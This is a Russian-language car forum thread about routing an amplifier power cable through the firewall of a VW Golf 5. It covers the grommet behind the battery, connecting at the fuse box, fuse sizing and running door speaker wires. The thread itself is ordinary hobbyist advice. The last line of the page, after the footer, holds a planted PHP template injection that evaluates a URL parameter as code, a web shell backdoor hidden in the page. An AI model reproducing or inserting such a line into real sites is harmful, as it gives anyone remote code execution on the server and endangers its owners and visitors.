+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 26

Тема: Протяжка кабеля в г5


  1. #1
    GTI-Racing shеff is on a distinguished road Аватар для shеff
    Регистрация
    16.01.2007
    Машина
    Golf VI 2 раза
    Сообщений
    72
    Ребят помогите, уже 3 недели езжу с "плоской" музыкой без саба... Надо протянуть + от усилка к АКБ, но вот задача не могу найти отверстие из салона в подкапотное пространство... подскажите пожалйста ктонибудь, не дайте помереть!!! Г5 стоковый не гти.

  2. #2
    GTI-Racing crawl is on a distinguished road Аватар для crawl
    Регистрация
    13.09.2007
    Откуда
    MV, CA USA
    Машина
    Jetta 2.0T
    Сообщений
    141
    <div class='quotetop'>Цитата(shеff &#064; Mar 29 2008, 11&#58;45) <{POST_SNAPBACK}></div><div class='quotemain'>Ребят помогите, уже 3 недели езжу с "плоской" музыкой без саба... Надо протянуть + от усилка к АКБ, но вот задача не могу найти отверстие из салона в подкапотное пространство... подскажите пожалйста ктонибудь, не дайте помереть&#33;&#33;&#33; Г5 стоковый не гти.[/b][/quote]

    Сними аккумулятор и прямо за ним есть место.
    ща фото найду...

  3. #3
    GTI-Racing shеff is on a distinguished road Аватар для shеff
    Регистрация
    16.01.2007
    Машина
    Golf VI 2 раза
    Сообщений
    72
    Rак говорится, пока сам не полезешь не узнаешь&#33;

    И так&#33;

    1. Снимаем АКБ (начинаем с минуса) и смотрим в глубь от вакуумника




    2. Там видим на резинке через которую идет жгут в салон "соски" это и есть что нам надо, отрезаем нужный (один из) и вуаля тянем через него провод (т.к. у меня сечение было чуть тоньше чем сама резинка то из нутри я потом приклеил кусочек шумки, а провод обматал с наружи матерчатой изолетной.



    Из салона это выглядит так



    3. После того как все детально проанализировав я понял что прикручивать провод к акб будет ацким колхозом, увидел что провод от клемы идет на распределительный щиток и сечение у него явно больше че у моего. В итоге прикрутил я провод по цивильному (мой колхоз справа крайний)



    4. Посадив на провод 40ка амперный пред я этим самым защитил всю конструкцию от "недай бог чего".


  4. #4
    GTI-Racing crawl is on a distinguished road Аватар для crawl
    Регистрация
    13.09.2007
    Откуда
    MV, CA USA
    Машина
    Jetta 2.0T
    Сообщений
    141
    Замечательное описалово.

    Извини что я так и не повесил фотки, я их походу удалил. А вот на счет прикрутить провод коробке с предохранителями меня не допёрло, правда мой в 2 раза толще, но я еще переделаю как время будет.

    З.ы
    прикольно 1.6 выглядит, места для турбины/суперчаджера полно

  5. #5
    GTI-Racing Filya is on a distinguished road Аватар для Filya
    Регистрация
    02.04.2007
    Откуда
    Москва
    Машина
    С 300 4М
    Сообщений
    581
    у меня тоже провод потолще. я все же прикрутил клемму к клемме аккумулятора.
    И пустил всё через 30А предохранитель-автомат. Сам продохранитель-автомат посадил на пластиковый чехол аккумулятора.
    С автоматом удобно. оставляешь машину на долго в гараже - взял его и выключил на всякий случай. хочешь снять усилитель - взял и выключил.
    есть запчасти от GTI5

  6. #6
    GTI-Racing Filya is on a distinguished road Аватар для Filya
    Регистрация
    02.04.2007
    Откуда
    Москва
    Машина
    С 300 4М
    Сообщений
    581
    А еще интересней было с проводкой проводов в колонки в двери.
    вся штатная проводка идет через штеккера в стойке (для задних дверей) и такой же штеккер под передним крылом (для передней двери). так как проводка должна идти без лишних соединений, то я поступил следующим образом.
    В штеккерах для штатной проводки вся нижняя часть контактов пустая (штеккер очень большой и много места не используется). Я в обоих частях штеккера (внутреня со стороны салона и внешняя от которой идет резиновая гофра с проводкой к торцу двери)просверлил дырки (спилил перегородки между несколькими дырками для контактов) в образовавшееся отверстие напрямую сквозь обе части родного штеккера нормально прошли провода 2х6квадратов.
    есть запчасти от GTI5

  7. #7
    GTI-Racing Magestic is on a distinguished road Аватар для Magestic
    Регистрация
    19.02.2008
    Сообщений
    25
    у меня сечение кабеля 53 мм...и пред на 150.. тип преда ANL... как тянуть буду незнаю.. но процесс опишу:)... чуствую будет весело :) ....

  8. #8
    Спасибо за описание и фотографии,все сделал по схеме и получилось))

  9. #9
    GTI-Racing Magestic is on a distinguished road Аватар для Magestic
    Регистрация
    19.02.2008
    Сообщений
    25
    ну что...50 квадратов и я проложел... через сцепление:) у меня педали нету (DSG)... и тама заглушка нехилая:)... вот её и окучил....

  10. #10
    GTI-Racing Tosik is on a distinguished road Аватар для Tosik
    Регистрация
    22.08.2010
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    а как провод включения усилка кто куда потключал?)))

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}